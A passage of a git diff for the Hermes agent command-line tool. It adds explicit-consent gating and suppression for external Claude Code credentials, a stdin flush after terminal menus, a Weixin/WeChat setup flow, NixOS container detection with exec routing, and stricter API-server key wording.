|
||||
|
||||
|
||||
def is_source_suppressed(provider_id: str, source: str) -> bool:
|
||||
"""Check if a credential source has been suppressed by the user."""
|
||||
try:
|
||||
auth_store = _load_auth_store()
|
||||
suppressed = auth_store.get("suppressed_sources", {})
|
||||
return source in suppressed.get(provider_id, [])
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
|
||||
def get_provider_auth_state(provider_id: str) -> Optional[Dict[str, Any]]:
|
||||
"""Return persisted auth state for a provider, or None."""
|
||||
auth_store = _load_auth_store()
|
||||
@@ -716,6 +745,57 @@ def get_active_provider() -> Optional[str]:
|
||||
return auth_store.get("active_provider")
|
||||
|
||||
|
||||
def is_provider_explicitly_configured(provider_id: str) -> bool:
|
||||
"""Return True only if the user has explicitly configured this provider.
|
||||
|
||||
Checks:
|
||||
1. active_provider in auth.json matches
|
||||
2. model.provider in config.yaml matches
|
||||
3. Provider-specific env vars are set (e.g. ANTHROPIC_API_KEY)
|
||||
|
||||
This is used to gate auto-discovery of external credentials (e.g.
|
||||
Claude Code's ~/.claude/.credentials.json) so they are never used
|
||||
without the user's explicit choice. See PR #4210 for the same
|
||||
pattern applied to the setup wizard gate.
|
||||
"""
|
||||
normalized = (provider_id or "").strip().lower()
|
||||
|
||||
# 1. Check auth.json active_provider
|
||||
try:
|
||||
auth_store = _load_auth_store()
|
||||
active = (auth_store.get("active_provider") or "").strip().lower()
|
||||
if active and active == normalized:
|
||||
return True
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 2. Check config.yaml model.provider
|
||||
try:
|
||||
from hermes_cli.config import load_config
|
||||
cfg = load_config()
|
||||
model_cfg = cfg.get("model")
|
||||
if isinstance(model_cfg, dict):
|
||||
cfg_provider = (model_cfg.get("provider") or "").strip().lower()
|
||||
if cfg_provider == normalized:
|
||||
return True
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 3. Check provider-specific env vars
|
||||
# Exclude CLAUDE_CODE_OAUTH_TOKEN — it's set by Claude Code itself,
|
||||
# not by the user explicitly configuring anthropic in Hermes.
|
||||
_IMPLICIT_ENV_VARS = {"CLAUDE_CODE_OAUTH_TOKEN"}
|
||||
pconfig = PROVIDER_REGISTRY.get(normalized)
|
||||
if pconfig and pconfig.auth_type == "api_key":
|
||||
for env_var in pconfig.api_key_env_vars:
|
||||
if env_var in _IMPLICIT_ENV_VARS:
|
||||
continue
|
||||
if has_usable_secret(os.getenv(env_var, "")):
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
|
||||
def clear_provider_auth(provider_id: Optional[str] = None) -> bool:
|
||||
"""
|
||||
Clear auth state for a provider. Used by `hermes logout`.
|
||||
@@ -818,7 +898,7 @@ def resolve_provider(
|
||||
_PROVIDER_ALIASES = {
|
||||
"glm": "zai", "z-ai": "zai", "z.ai": "zai", "zhipu": "zai",
|
||||
"google": "gemini", "google-gemini": "gemini", "google-ai-studio": "gemini",
|
||||
"kimi": "kimi-coding", "moonshot": "kimi-coding",
|
||||
"kimi": "kimi-coding", "kimi-for-coding": "kimi-coding", "moonshot": "kimi-coding",
|
||||
"minimax-china": "minimax-cn", "minimax_cn": "minimax-cn",
|
||||
"claude": "anthropic", "claude-code": "anthropic",
|
||||
"github": "copilot", "github-copilot": "copilot",
|
||||
@@ -1441,7 +1521,15 @@ def _resolve_verify(
|
||||
if effective_insecure:
|
||||
return False
|
||||
if effective_ca:
|
||||
return str(effective_ca)
|
||||
ca_path = str(effective_ca)
|
||||
if not os.path.isfile(ca_path):
|
||||
import logging
|
||||
logging.getLogger("hermes.auth").warning(
|
||||
"CA bundle path does not exist: %s — falling back to default certificates",
|
||||
ca_path,
|
||||
)
|
||||
return True
|
||||
return ca_path
|
||||
return True
|
||||
|
||||
|
||||
@@ -2544,6 +2632,8 @@ def _prompt_model_selection(
|
||||
title=effective_title,
|
||||
)
|
||||
idx = menu.show()
|
||||
from hermes_cli.curses_ui import flush_stdin
|
||||
flush_stdin()
|
||||
if idx is None:
|
||||
return None
|
||||
print()
|
||||
|
||||
@@ -347,8 +347,11 @@ def auth_remove_command(args) -> None:
|
||||
print("Cleared Hermes Anthropic OAuth credentials")
|
||||
|
||||
elif removed.source == "claude_code" and provider == "anthropic":
|
||||
print("Note: Claude Code credentials live in ~/.claude/.credentials.json")
|
||||
print(" Remove them manually if you want to deauthorize Claude Code.")
|
||||
from hermes_cli.auth import suppress_credential_source
|
||||
suppress_credential_source(provider, "claude_code")
|
||||
print("Suppressed claude_code credential — it will not be re-seeded.")
|
||||
print("Note: Claude Code credentials still live in ~/.claude/.credentials.json")
|
||||
print("Run `hermes auth add anthropic` to re-enable if needed.")
|
||||
|
||||
|
||||
def auth_reset_command(args) -> None:
|
||||
|
||||
@@ -83,8 +83,7 @@ COMMAND_REGISTRY: list[CommandDef] = [
|
||||
args_hint="<question>"),
|
||||
CommandDef("queue", "Queue a prompt for the next turn (doesn't interrupt)", "Session",
|
||||
aliases=("q",), args_hint="<prompt>"),
|
||||
CommandDef("status", "Show session info", "Session",
|
||||
gateway_only=True),
|
||||
CommandDef("status", "Show session info", "Session"),
|
||||
CommandDef("profile", "Show active profile name and home directory", "Info"),
|
||||
CommandDef("sethome", "Set this chat as the home channel", "Session",
|
||||
gateway_only=True, aliases=("set-home",)),
|
||||
@@ -111,7 +110,7 @@ COMMAND_REGISTRY: list[CommandDef] = [
|
||||
args_hint="[level|show|hide]",
|
||||
subcommands=("none", "minimal", "low", "medium", "high", "xhigh", "show", "hide", "on", "off")),
|
||||
CommandDef("fast", "Toggle fast mode — OpenAI Priority Processing / Anthropic Fast Mode (Normal/Fast)", "Configuration",
|
||||
cli_only=True, args_hint="[normal|fast|status]",
|
||||
args_hint="[normal|fast|status]",
|
||||
subcommands=("normal", "fast", "status", "on", "off")),
|
||||
CommandDef("skin", "Show or change the display skin/theme", "Configuration",
|
||||
cli_only=True, args_hint="[name]"),
|
||||
|
||||
+68
-3
@@ -39,6 +39,9 @@ _EXTRA_ENV_KEYS = frozenset({
|
||||
"DINGTALK_CLIENT_ID", "DINGTALK_CLIENT_SECRET",
|
||||
"FEISHU_APP_ID", "FEISHU_APP_SECRET", "FEISHU_ENCRYPT_KEY", "FEISHU_VERIFICATION_TOKEN",
|
||||
"WECOM_BOT_ID", "WECOM_SECRET",
|
||||
"WEIXIN_ACCOUNT_ID", "WEIXIN_TOKEN", "WEIXIN_BASE_URL", "WEIXIN_CDN_BASE_URL",
|
||||
"WEIXIN_HOME_CHANNEL", "WEIXIN_HOME_CHANNEL_NAME", "WEIXIN_DM_POLICY", "WEIXIN_GROUP_POLICY",
|
||||
"WEIXIN_ALLOWED_USERS", "WEIXIN_GROUP_ALLOWED_USERS", "WEIXIN_ALLOW_ALL_USERS",
|
||||
"BLUEBUBBLES_SERVER_URL", "BLUEBUBBLES_PASSWORD",
|
||||
"TERMINAL_ENV", "TERMINAL_SSH_KEY", "TERMINAL_SSH_PORT",
|
||||
"WHATSAPP_MODE", "WHATSAPP_ENABLED",
|
||||
@@ -138,6 +141,68 @@ def managed_error(action: str = "modify configuration"):
|
||||
print(format_managed_message(action), file=sys.stderr)
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# Container-aware CLI (NixOS container mode)
|
||||
# =============================================================================
|
||||
|
||||
def _is_inside_container() -> bool:
|
||||
"""Detect if we're already running inside a Docker/Podman container."""
|
||||
# Standard Docker/Podman indicators
|
||||
if os.path.exists("/.dockerenv"):
|
||||
return True
|
||||
# Podman uses /run/.containerenv
|
||||
if os.path.exists("/run/.containerenv"):
|
||||
return True
|
||||
# Check cgroup for container runtime evidence (works for both Docker & Podman)
|
||||
try:
|
||||
with open("/proc/1/cgroup", "r") as f:
|
||||
cgroup = f.read()
|
||||
if "docker" in cgroup or "podman" in cgroup or "/lxc/" in cgroup:
|
||||
return True
|
||||
except (OSError, IOError):
|
||||
pass
|
||||
return False
|
||||
|
||||
|
||||
def get_container_exec_info() -> Optional[dict]:
|
||||
"""Read container mode metadata from HERMES_HOME/.container-mode.
|
||||
|
||||
Returns a dict with keys: backend, container_name, hermes_bin
|
||||
or None if container mode is not active or we're already inside the container.
|
||||
|
||||
The .container-mode file is written by the NixOS activation script when
|
||||
container.enable = true. It tells the host CLI to exec into the container
|
||||
instead of running locally.
|
||||
"""
|
||||
if _is_inside_container():
|
||||
return None
|
||||
|
||||
container_mode_file = get_hermes_home() / ".container-mode"
|
||||
if not container_mode_file.exists():
|
||||
return None
|
||||
|
||||
try:
|
||||
info = {}
|
||||
with open(container_mode_file, "r") as f:
|
||||
for line in f:
|
||||
line = line.strip()
|
||||
if "=" in line and not line.startswith("#"):
|
||||
key, _, value = line.partition("=")
|
||||
info[key.strip()] = value.strip()
|
||||
|
||||
backend = info.get("backend", "docker")
|
||||
container_name = info.get("container_name", "hermes-agent")
|
||||
hermes_bin = info.get("hermes_bin", "/data/current-package/bin/hermes")
|
||||
|
||||
return {
|
||||
"backend": backend,
|
||||
"container_name": container_name,
|
||||
"hermes_bin": hermes_bin,
|
||||
}
|
||||
except (OSError, IOError):
|
||||
return None
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# Config paths
|
||||
# =============================================================================
|
||||
@@ -1206,8 +1271,8 @@ OPTIONAL_ENV_VARS = {
|
||||
"advanced": True,
|
||||
},
|
||||
"API_SERVER_KEY": {
|
||||
"description": "Bearer token for API server authentication. If empty, all requests are allowed (local use only).",
|
||||
"prompt": "API server auth key (optional)",
|
||||
"description": "Bearer token for API server authentication. Required for non-loopback binding; server refuses to start without it. On loopback (127.0.0.1), all requests are allowed if empty.",
|
||||
"prompt": "API server auth key (required for network access)",
|
||||
"url": None,
|
||||
"password": True,
|
||||
"category": "messaging",
|
||||
@@ -1222,7 +1287,7 @@ OPTIONAL_ENV_VARS = {
|
||||
"advanced": True,
|
||||
},
|
||||
"API_SERVER_HOST": {
|
||||
"description": "Host/bind address for the API server (default: 127.0.0.1). Use 0.0.0.0 for network access — requires API_SERVER_KEY for security.",
|
||||
"description": "Host/bind address for the API server (default: 127.0.0.1). Use 0.0.0.0 for network access — server refuses to start without API_SERVER_KEY.",
|
||||
"prompt": "API server host",
|
||||
"url": None,
|
||||
"password": False,
|
||||
|
||||
@@ -10,6 +10,28 @@ from typing import Callable, List, Optional, Set
|
||||
from hermes_cli.colors import Colors, color
|
||||
|
||||
|
||||
def flush_stdin() -> None:
|
||||
"""Flush any stray bytes from the stdin input buffer.
|
||||
|
||||
Must be called after ``curses.wrapper()`` (or any terminal-mode library
|
||||
like simple_term_menu) returns, **before** the next ``input()`` /
|
||||
``getpass.getpass()`` call. ``curses.endwin()`` restores the terminal
|
||||
but does NOT drain the OS input buffer — leftover escape-sequence bytes
|
||||
(from arrow keys, terminal mode-switch responses, or rapid keypresses)
|
||||
remain buffered and silently get consumed by the next ``input()`` call,
|
||||
corrupting user data (e.g. writing ``^[^[`` into .env files).
|
||||
|
||||
On non-TTY stdin (piped, redirected) or Windows, this is a no-op.
|
||||
"""
|
||||
try:
|
||||
if not sys.stdin.isatty():
|
||||
return
|
||||
import termios
|
||||
termios.tcflush(sys.stdin, termios.TCIFLUSH)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
|
||||
def curses_checklist(
|
||||
title: str,
|
||||
items: List[str],
|
||||
@@ -131,6 +153,7 @@ def curses_checklist(
|
||||
return
|
||||
|
||||
curses.wrapper(_draw)
|
||||
flush_stdin()
|
||||
return result_holder[0] if result_holder[0] is not None else cancel_returns
|
||||
|
||||
except Exception:
|
||||
|
||||
@@ -119,6 +119,7 @@ def _configured_platforms() -> list[str]:
|
||||
"dingtalk": "DINGTALK_CLIENT_ID",
|
||||
"feishu": "FEISHU_APP_ID",
|
||||
"wecom": "WECOM_BOT_ID",
|
||||
"weixin": "WEIXIN_ACCOUNT_ID",
|
||||
}
|
||||
return [name for name, env in checks.items() if os.getenv(env)]
|
||||
|
||||
|
||||
+151
-9
@@ -251,18 +251,18 @@ SERVICE_DESCRIPTION = "Hermes Agent Gateway - Messaging Platform Integration"
|
||||
def _profile_suffix() -> str:
|
||||
"""Derive a service-name suffix from the current HERMES_HOME.
|
||||
|
||||
Returns ``""`` for the default ``~/.hermes``, the profile name for
|
||||
``~/.hermes/profiles/<name>``, or a short hash for any other custom
|
||||
HERMES_HOME path.
|
||||
Returns ``""`` for the default root, the profile name for
|
||||
``<root>/profiles/<name>``, or a short hash for any other path.
|
||||
Works correctly in Docker (HERMES_HOME=/opt/data) and standard deployments.
|
||||
"""
|
||||
import hashlib
|
||||
import re
|
||||
from pathlib import Path as _Path
|
||||
from hermes_constants import get_default_hermes_root
|
||||
home = get_hermes_home().resolve()
|
||||
default = (_Path.home() / ".hermes").resolve()
|
||||
default = get_default_hermes_root().resolve()
|
||||
if home == default:
|
||||
return ""
|
||||
# Detect ~/.hermes/profiles/<name> pattern → use the profile name
|
||||
# Detect <root>/profiles/<name> pattern → use the profile name
|
||||
profiles_root = (default / "profiles").resolve()
|
||||
try:
|
||||
rel = home.relative_to(profiles_root)
|
||||
@@ -287,9 +287,9 @@ def _profile_arg(hermes_home: str | None = None) -> str:
|
||||
service definition for a different user (e.g. system service).
|
||||
"""
|
||||
import re
|
||||
from pathlib import Path as _Path
|
||||
from hermes_constants import get_default_hermes_root
|
||||
home = Path(hermes_home or str(get_hermes_home())).resolve()
|
||||
default = (_Path.home() / ".hermes").resolve()
|
||||
default = get_default_hermes_root().resolve()
|
||||
if home == default:
|
||||
return ""
|
||||
profiles_root = (default / "profiles").resolve()
|
||||
@@ -1624,6 +1624,12 @@ _PLATFORMS = [
|
||||
"help": "Chat ID for scheduled results and notifications."},
|
||||
],
|
||||
},
|
||||
{
|
||||
"key": "weixin",
|
||||
"label": "Weixin / WeChat",
|
||||
"emoji": "💬",
|
||||
"token_var": "WEIXIN_ACCOUNT_ID",
|
||||
},
|
||||
{
|
||||
"key": "bluebubbles",
|
||||
"label": "BlueBubbles (iMessage)",
|
||||
@@ -1696,6 +1702,13 @@ def _platform_status(platform: dict) -> str:
|
||||
if val or password or homeserver:
|
||||
return "partially configured"
|
||||
return "not configured"
|
||||
if platform.get("key") == "weixin":
|
||||
token = get_env_value("WEIXIN_TOKEN")
|
||||
if val and token:
|
||||
return "configured"
|
||||
if val or token:
|
||||
return "partially configured"
|
||||
return "not configured"
|
||||
if val:
|
||||
return "configured"
|
||||
return "not configured"
|
||||
@@ -1799,7 +1812,7 @@ def _setup_standard_platform(platform: dict):
|
||||
print_warning(" Open access enabled — anyone can use your bot!")
|
||||
elif access_idx == 1:
|
||||
print_success(" DM pairing mode — users will receive a code to request access.")
|
||||
print_info(" Approve with: hermes pairing approve {platform} {code}")
|
||||
print_info(" Approve with: hermes pairing approve <platform> <code>")
|
||||
else:
|
||||
print_info(" Skipped — configure later with 'hermes gateway setup'")
|
||||
continue
|
||||
@@ -1886,6 +1899,133 @@ def _is_service_running() -> bool:
|
||||
return len(find_gateway_pids()) > 0
|
||||
|
||||
|
||||
def _setup_weixin():
|
||||
"""Interactive setup for Weixin / WeChat personal accounts."""
|
||||
print()
|
||||
print(color(" ─── 💬 Weixin / WeChat Setup ───", Colors.CYAN))
|
||||
print()
|
||||
print_info(" 1. Hermes will open Tencent iLink QR login in this terminal.")
|
||||
print_info(" 2. Use WeChat to scan and confirm the QR code.")
|
||||
print_info(" 3. Hermes will store the returned account_id/token in ~/.hermes/.env.")
|
||||
print_info(" 4. This adapter supports native text, image, video, and document delivery.")
|
||||
|
||||
existing_account = get_env_value("WEIXIN_ACCOUNT_ID")
|
||||
existing_token = get_env_value("WEIXIN_TOKEN")
|
||||
if existing_account and existing_token:
|
||||
print()
|
||||
print_success("Weixin is already configured.")
|
||||
if not prompt_yes_no(" Reconfigure Weixin?", False):
|
||||
return
|
||||
|
||||
try:
|
||||
from gateway.platforms.weixin import check_weixin_requirements, qr_login
|
||||
except Exception as exc:
|
||||
print_error(f" Weixin adapter import failed: {exc}")
|
||||
print_info(" Install gateway dependencies first, then retry.")
|
||||
return
|
||||
|
||||
if not check_weixin_requirements():
|
||||
print_error(" Missing dependencies: Weixin needs aiohttp and cryptography.")
|
||||
print_info(" Install them, then rerun `hermes gateway setup`.")
|
||||
return
|
||||
|
||||
print()
|
||||
if not prompt_yes_no(" Start QR login now?", True):
|
||||
print_info(" Cancelled.")
|
||||
return
|
||||
|
||||
import asyncio
|
||||
try:
|
||||
credentials = asyncio.run(qr_login(str(get_hermes_home())))
|
||||
except KeyboardInterrupt:
|
||||
print()
|
||||
print_warning(" Weixin setup cancelled.")
|
||||
return
|
||||
except Exception as exc:
|
||||
print_error(f" QR login failed: {exc}")
|
||||
return
|
||||
|
||||
if not credentials:
|
||||
print_warning(" QR login did not complete.")
|
||||
return
|
||||
|
||||
account_id = credentials.get("account_id", "")
|
||||
token = credentials.get("token", "")
|
||||
base_url = credentials.get("base_url", "")
|
||||
user_id = credentials.get("user_id", "")
|
||||
|
||||
save_env_value("WEIXIN_ACCOUNT_ID", account_id)
|
||||
save_env_value("WEIXIN_TOKEN", token)
|
||||
if base_url:
|
||||
save_env_value("WEIXIN_BASE_URL", base_url)
|
||||
save_env_value("WEIXIN_CDN_BASE_URL", get_env_value("WEIXIN_CDN_BASE_URL") or "https://novac2c.cdn.weixin.qq.com/c2c")
|
||||
|
||||
print()
|
||||
access_choices = [
|
||||
"Use DM pairing approval (recommended)",
|
||||
"Allow all direct messages",
|
||||
"Only allow listed user IDs",
|
||||
"Disable direct messages",
|
||||
]
|
||||
access_idx = prompt_choice(" How should direct messages be authorized?", access_choices, 0)
|
||||
if access_idx == 0:
|
||||
save_env_value("WEIXIN_DM_POLICY", "pairing")
|
||||
save_env_value("WEIXIN_ALLOW_ALL_USERS", "false")
|
||||
save_env_value("WEIXIN_ALLOWED_USERS", "")
|
||||
print_success(" DM pairing enabled.")
|
||||
print_info(" Unknown DM users can request access and you approve them with `hermes pairing approve`.")
|
||||
elif access_idx == 1:
|
||||
save_env_value("WEIXIN_DM_POLICY", "open")
|
||||
save_env_value("WEIXIN_ALLOW_ALL_USERS", "true")
|
||||
save_env_value("WEIXIN_ALLOWED_USERS", "")
|
||||
print_warning(" Open DM access enabled for Weixin.")
|
||||
elif access_idx == 2:
|
||||
default_allow = user_id or ""
|
||||
allowlist = prompt(" Allowed Weixin user IDs (comma-separated)", default_allow, password=False).replace(" ", "")
|
||||
save_env_value("WEIXIN_DM_POLICY", "allowlist")
|
||||
save_env_value("WEIXIN_ALLOW_ALL_USERS", "false")
|
||||
save_env_value("WEIXIN_ALLOWED_USERS", allowlist)
|
||||
print_success(" Weixin allowlist saved.")
|
||||
else:
|
||||
save_env_value("WEIXIN_DM_POLICY", "disabled")
|
||||
save_env_value("WEIXIN_ALLOW_ALL_USERS", "false")
|
||||
save_env_value("WEIXIN_ALLOWED_USERS", "")
|
||||
print_warning(" Direct messages disabled.")
|
||||
|
||||
print()
|
||||
group_choices = [
|
||||
"Disable group chats (recommended)",
|
||||
"Allow all group chats",
|
||||
"Only allow listed group chat IDs",
|
||||
]
|
||||
group_idx = prompt_choice(" How should group chats be handled?", group_choices, 0)
|
||||
if group_idx == 0:
|
||||
save_env_value("WEIXIN_GROUP_POLICY", "disabled")
|
||||
save_env_value("WEIXIN_GROUP_ALLOWED_USERS", "")
|
||||
print_info(" Group chats disabled.")
|
||||
elif group_idx == 1:
|
||||
save_env_value("WEIXIN_GROUP_POLICY", "open")
|
||||
save_env_value("WEIXIN_GROUP_ALLOWED_USERS", "")
|
||||
print_warning(" All group chats enabled.")
|
||||
else:
|
||||
allow_groups = prompt(" Allowed group chat IDs (comma-separated)", "", password=False).replace(" ", "")
|
||||
save_env_value("WEIXIN_GROUP_POLICY", "allowlist")
|
||||
save_env_value("WEIXIN_GROUP_ALLOWED_USERS", allow_groups)
|
||||
print_success(" Group allowlist saved.")
|
||||
|
||||
if user_id:
|
||||
print()
|
||||
if prompt_yes_no(f" Use your Weixin user ID ({user_id}) as the home channel?", True):
|
||||
save_env_value("WEIXIN_HOME_CHANNEL", user_id)
|
||||
print_success(f" Home channel set to {user_id}")
|
||||
|
||||
print()
|
||||
print_success("Weixin configured!")
|
||||
print_info(f" Account ID: {account_id}")
|
||||
if user_id:
|
||||
print_info(f" User ID: {user_id}")
|
||||
|
||||
|
||||
def _setup_signal():
|
||||
"""Interactive setup for Signal messenger."""
|
||||
import shutil
|
||||
@@ -2061,6 +2201,8 @@ def gateway_setup():
|
||||
_setup_whatsapp()
|
||||
elif platform["key"] == "signal":
|
||||
_setup_signal()
|
||||
elif platform["key"] == "weixin":
|
||||
_setup_weixin()
|
||||
else:
|
||||
_setup_standard_platform(platform)
|
||||
|
||||
|
||||
+113
-33
@@ -97,10 +97,11 @@ def _apply_profile_override() -> None:
|
||||
consume = 1
|
||||
break
|
||||
|
||||
# 2. If no flag, check ~/.hermes/active_profile
|
||||
# 2. If no flag, check active_profile in the hermes root
|
||||
if profile_name is None:
|
||||
try:
|
||||
active_path = Path.home() / ".hermes" / "active_profile"
|
||||
from hermes_constants import get_default_hermes_root
|
||||
active_path = get_default_hermes_root() / "active_profile"
|
||||
if active_path.exists():
|
||||
name = active_path.read_text().strip()
|
||||
if name and name != "default":
|
||||
@@ -527,6 +528,56 @@ def _resolve_last_cli_session() -> Optional[str]:
|
||||
return None
|
||||
|
||||
|
||||
def _exec_in_container(container_info: dict, cli_args: list):
|
||||
"""Replace the current process with a command inside the managed container.
|
||||
|
||||
Uses os.execvp to hand off to docker/podman exec, preserving the TTY
|
||||
so the interactive CLI works seamlessly inside the container.
|
||||
|
||||
Args:
|
||||
container_info: dict with backend, container_name, hermes_bin
|
||||
cli_args: the original CLI arguments (everything after 'hermes')
|
||||
"""
|
||||
import shutil
|
||||
import subprocess
|
||||
|
||||
backend = container_info["backend"]
|
||||
container_name = container_info["container_name"]
|
||||
hermes_bin = container_info["hermes_bin"]
|
||||
|
||||
# Find the container runtime on PATH
|
||||
runtime = shutil.which(backend)
|
||||
if not runtime:
|
||||
print(f"Warning: {backend} not found on PATH, falling back to host CLI.",
|
||||
file=sys.stderr)
|
||||
return # Fall through to normal CLI
|
||||
|
||||
# Check if the container is actually running
|
||||
try:
|
||||
result = subprocess.run(
|
||||
[runtime, "inspect", "--format", "{{.State.Running}}", container_name],
|
||||
capture_output=True, text=True, timeout=5
|
||||
)
|
||||
if result.returncode != 0 or result.stdout.strip().lower() != "true":
|
||||
print(f"Warning: container '{container_name}' is not running, falling back to host CLI.",
|
||||
file=sys.stderr)
|
||||
return
|
||||
except (subprocess.TimeoutExpired, OSError):
|
||||
return # Fall through on any error
|
||||
|
||||
# Filter out --host flag from forwarded args (it's not meaningful inside)
|
||||
forwarded_args = [a for a in cli_args if a != "--host"]
|
||||
|
||||
# Build the exec command
|
||||
exec_cmd = [runtime, "exec", "-it", container_name, hermes_bin] + forwarded_args
|
||||
|
||||
print(f"Routing to container '{container_name}' via {backend}...",
|
||||
file=sys.stderr)
|
||||
|
||||
# Replace the current process — this never returns on success
|
||||
os.execvp(runtime, exec_cmd)
|
||||
|
||||
|
||||
def _resolve_session_by_name_or_id(name_or_id: str) -> Optional[str]:
|
||||
"""Resolve a session name (title) or ID to a session ID.
|
||||
|
||||
@@ -555,6 +606,21 @@ def _resolve_session_by_name_or_id(name_or_id: str) -> Optional[str]:
|
||||
|
||||
def cmd_chat(args):
|
||||
"""Run interactive chat CLI."""
|
||||
# ── Container-aware routing ──────────────────────────────────────────
|
||||
# When NixOS container mode is active and we're on the host, exec into
|
||||
# the managed container instead of running locally. --host bypasses this.
|
||||
if not getattr(args, "host", False):
|
||||
try:
|
||||
from hermes_cli.config import get_container_exec_info
|
||||
container_info = get_container_exec_info()
|
||||
if container_info:
|
||||
_exec_in_container(container_info, sys.argv[1:])
|
||||
# _exec_in_container calls os.execvp which replaces the process.
|
||||
# If we get here, the exec failed.
|
||||
sys.exit(1)
|
||||
except Exception:
|
||||
pass # Fall through to normal CLI on any detection error
|
||||
|
||||
# Resolve --continue into --resume with the latest CLI session or by name
|
||||
continue_val = getattr(args, "continue_last", None)
|
||||
if continue_val and not getattr(args, "resume", None):
|
||||
@@ -1672,6 +1738,8 @@ def _remove_custom_provider(config):
|
||||
title="Select provider to remove:",
|
||||
)
|
||||
idx = menu.show()
|
||||
from hermes_cli.curses_ui import flush_stdin
|
||||
flush_stdin()
|
||||
print()
|
||||
except (ImportError, NotImplementedError, OSError, subprocess.SubprocessError):
|
||||
for i, c in enumerate(choices, 1):
|
||||
@@ -1697,8 +1765,9 @@ def _remove_custom_provider(config):
|
||||
def _model_flow_named_custom(config, provider_info):
|
||||
"""Handle a named custom provider from config.yaml custom_providers list.
|
||||
|
||||
If the entry has a saved model name, activates it immediately.
|
||||
Otherwise probes the endpoint's /models API to let the user pick one.
|
||||
Always probes the endpoint's /models API to let the user pick a model.
|
||||
If a model was previously saved, it is pre-selected in the menu.
|
||||
Falls back to the saved model if probing fails.
|
||||
"""
|
||||
from hermes_cli.auth import _save_model_choice, deactivate_provider
|
||||
from hermes_cli.config import load_config, save_config
|
||||
@@ -1709,46 +1778,37 @@ def _model_flow_named_custom(config, provider_info):
|
||||
api_key = provider_info.get("api_key", "")
|
||||
saved_model = provider_info.get("model", "")
|
||||
|
||||
# If a model is saved, just activate immediately — no probing needed
|
||||
if saved_model:
|
||||
_save_model_choice(saved_model)
|
||||
|
||||
cfg = load_config()
|
||||
model = cfg.get("model")
|
||||
if not isinstance(model, dict):
|
||||
model = {"default": model} if model else {}
|
||||
cfg["model"] = model
|
||||
model["provider"] = "custom"
|
||||
model["base_url"] = base_url
|
||||
if api_key:
|
||||
model["api_key"] = api_key
|
||||
save_config(cfg)
|
||||
deactivate_provider()
|
||||
|
||||
print(f"✅ Switched to: {saved_model}")
|
||||
print(f" Provider: {name} ({base_url})")
|
||||
return
|
||||
|
||||
# No saved model — probe endpoint and let user pick
|
||||
print(f" Provider: {name}")
|
||||
print(f" URL: {base_url}")
|
||||
if saved_model:
|
||||
print(f" Current: {saved_model}")
|
||||
print()
|
||||
print("No model saved for this provider. Fetching available models...")
|
||||
|
||||
print("Fetching available models...")
|
||||
models = fetch_api_models(api_key, base_url, timeout=8.0)
|
||||
|
||||
if models:
|
||||
default_idx = 0
|
||||
if saved_model and saved_model in models:
|
||||
default_idx = models.index(saved_model)
|
||||
|
||||
print(f"Found {len(models)} model(s):\n")
|
||||
try:
|
||||
from simple_term_menu import TerminalMenu
|
||||
menu_items = [f" {m}" for m in models] + [" Cancel"]
|
||||
menu_items = [
|
||||
f" {m} (current)" if m == saved_model else f" {m}"
|
||||
for m in models
|
||||
] + [" Cancel"]
|
||||
menu = TerminalMenu(
|
||||
menu_items, cursor_index=0,
|
||||
menu_items, cursor_index=default_idx,
|
||||
menu_cursor="-> ", menu_cursor_style=("fg_green", "bold"),
|
||||
menu_highlight_style=("fg_green",),
|
||||
cycle_cursor=True, clear_screen=False,
|
||||
title=f"Select model from {name}:",
|
||||
)
|
||||
idx = menu.show()
|
||||
from hermes_cli.curses_ui import flush_stdin
|
||||
flush_stdin()
|
||||
print()
|
||||
if idx is None or idx >= len(models):
|
||||
print("Cancelled.")
|
||||
@@ -1756,7 +1816,8 @@ def _model_flow_named_custom(config, provider_info):
|
||||
model_name = models[idx]
|
||||
except (ImportError, NotImplementedError, OSError, subprocess.SubprocessError):
|
||||
for i, m in enumerate(models, 1):
|
||||
print(f" {i}. {m}")
|
||||
suffix = " (current)" if m == saved_model else ""
|
||||
print(f" {i}. {m}{suffix}")
|
||||
print(f" {len(models) + 1}. Cancel")
|
||||
print()
|
||||
try:
|
||||
@@ -1772,6 +1833,13 @@ def _model_flow_named_custom(config, provider_info):
|
||||
except (ValueError, KeyboardInterrupt, EOFError):
|
||||
print("\nCancelled.")
|
||||
return
|
||||
elif saved_model:
|
||||
print("Could not fetch models from endpoint.")
|
||||
try:
|
||||
model_name = input(f"Model name [{saved_model}]: ").strip() or saved_model
|
||||
except (KeyboardInterrupt, EOFError):
|
||||
print("\nCancelled.")
|
||||
return
|
||||
else:
|
||||
print("Could not fetch models from endpoint. Enter model name manually.")
|
||||
try:
|
||||
@@ -1867,6 +1935,8 @@ def _prompt_reasoning_effort_selection(efforts, current_effort=""):
|
||||
title="Select reasoning effort:",
|
||||
)
|
||||
idx = menu.show()
|
||||
from hermes_cli.curses_ui import flush_stdin
|
||||
flush_stdin()
|
||||
if idx is None:
|
||||
return None
|
||||
print()
|
||||
@@ -3309,10 +3379,11 @@ def _invalidate_update_cache():
|
||||
``hermes update``, every profile is now current.
|
||||
"""
|
||||
homes = []
|
||||
# Default profile home
|
||||
default_home = Path.home() / ".hermes"
|
||||
# Default profile home (Docker-aware — uses /opt/data in Docker)
|
||||
from hermes_constants import get_default_hermes_root
|
||||
default_home = get_default_hermes_root()
|
||||
homes.append(default_home)
|
||||
# Named profiles under ~/.hermes/profiles/
|
||||
# Named profiles under <root>/profiles/
|
||||
profiles_root = default_home / "profiles"
|
||||
if profiles_root.is_dir():
|
||||
for entry in profiles_root.iterdir():
|
||||
@@ -4049,7 +4120,10 @@ def cmd_profile(args):
|
||||
print(f" {name} chat Start chatting")
|
||||
print(f" {name} gateway start Start the messaging gateway")
|
||||
if clone or clone_all:
|
||||
profile_dir_display = f"~/.hermes/profiles/{name}"
|
||||
try:
|
||||
profile_dir_display = "~/" + str(profile_dir.relative_to(Path.home()))
|
||||
except ValueError:
|
||||
profile_dir_display = str(profile_dir)
|
||||
print(f"\n Edit {profile_dir_display}/.env for different API keys")
|
||||
print(f" Edit {profile_dir_display}/SOUL.md for different personality")
|
||||
print()
|
||||
@@ -4377,6 +4451,12 @@ For more help on a command:
|
||||
default=None,
|
||||
